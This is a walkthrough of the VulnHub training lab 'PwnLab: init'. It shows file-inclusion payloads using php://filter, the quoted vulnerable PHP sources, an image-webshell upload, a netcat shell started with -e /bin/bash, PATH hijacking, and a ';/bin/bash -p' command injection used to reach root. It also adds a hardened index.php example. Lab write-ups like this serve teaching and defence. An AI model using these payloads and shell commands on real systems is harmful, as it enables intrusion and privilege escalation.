VulnHub Lab: PwnLab: init Penetration Test Walkthrough
0x00 Target link
PwnLab: init ~ VulnHub
0x01 Information gathering
Port scan
Directory scan
0x02 Web testing
Visit the web page
Clicking Login reveals a page parameter. Try the php://filter stream wrapper to read the page sources in base64:
?page=php://filter/read=convert.base64-encode/resource=index
?page=php://filter/read=convert.base64-encode/resource=config
?page=php://filter/read=convert.base64-encode/resource=upload
?page=php://filter/read=convert.base64-encode/resource=login
Decoding each response gives the source. index.php source, which contains a file inclusion vulnerability:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
Both include("lang/".$_COOKIE['lang']) and include($_GET['page'].".php") build a path from untrusted request input, which is the file inclusion vulnerability.
upload.php source:
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}
?>
This is a whitelist check, so only an image with an embedded webshell (an "image horse") can be uploaded; it can then be executed through the index.php file inclusion vulnerability to get a shell. Logging in is required before uploading.
Reading config.php through the same wrapper gives the database password; port 3306 is open:
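The chain above only works because index.php includes paths built from request input. As an added example, not the PwnLab code, here is a hardened index.php that uses the page parameter and the lang cookie purely as keys into fixed tables; the lang/en.lang.php and lang/fr.lang.php files are assumed to exist.

```php
<?php
// Added example (not the PwnLab code): hardened index.php.
// Request values are only used as keys into fixed tables, so
// php://filter wrappers, path traversal and the lang cookie trick
// never reach include().
$pages = [
    'home'   => null,                   // no include, show default text
    'login'  => __DIR__ . '/login.php',
    'upload' => __DIR__ . '/upload.php',
];
$langs = [
    'en' => __DIR__ . '/lang/en.lang.php', // assumed to exist
    'fr' => __DIR__ . '/lang/fr.lang.php', // assumed translation file
];

$lang = $_COOKIE['lang'] ?? 'en';
if (!array_key_exists($lang, $langs)) {
    $lang = 'en';                       // unknown cookie value: fall back
}
include $langs[$lang];

$page = $_GET['page'] ?? 'home';
if (!array_key_exists($page, $pages)) {
    http_response_code(404);
    $page = 'home';                     // unknown page: fall back, no include
}
?>
<html>
<head><title>PwnLab Intranet Image Hosting</title></head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if ($pages[$page] !== null) {
    include $pages[$page];
} else {
    echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
```

With this, an uploaded GIF that passes the upload.php checks is never executed, because nothing on the server includes a path the client chose; disabling PHP execution inside upload/ is a second, independent layer.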
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
Connecting to the database gives the login passwords, which are stored base64-encoded; decoding yields three users and their passwords. Log in and upload the image webshell.
Uploading the webshell as a GIF succeeds.
From the upload.php source, the file is saved as upload/a7200b4bac77e8804f9e48304a92b6d9.gif (the md5 of the original filename plus the extension).
Getshell
Connect to the image webshell with AntSword to get a shell.
Use nc to spawn a shell (the target listens on port 7777 with -e /bin/bash, and Kali connects to it):
nc -lvp 7777 -e /bin/bash
Kali connects successfully.
Use Python to get a fully interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl z
stty raw -echo;fg
reset
export SHELL=bash
export TERM=xterm
0x03 Privilege escalation
Checking /etc/passwd shows the following three users; trying the passwords obtained from the database earlier works:
kent: login succeeds, nothing useful found
mike: login fails
kane: login succeeds; the home directory contains an executable file, msgmike
Inspecting msgmike shows that when it runs a command, it looks the command up through the PATH environment variable, so we can set PATH ourselves.
Running it afterwards escalates to mike.
In mike's home directory there is a msg2root file; analysing it in IDA shows that running the program and entering ;/bin/bash -p gives root.
Read flag.txt in the root directory.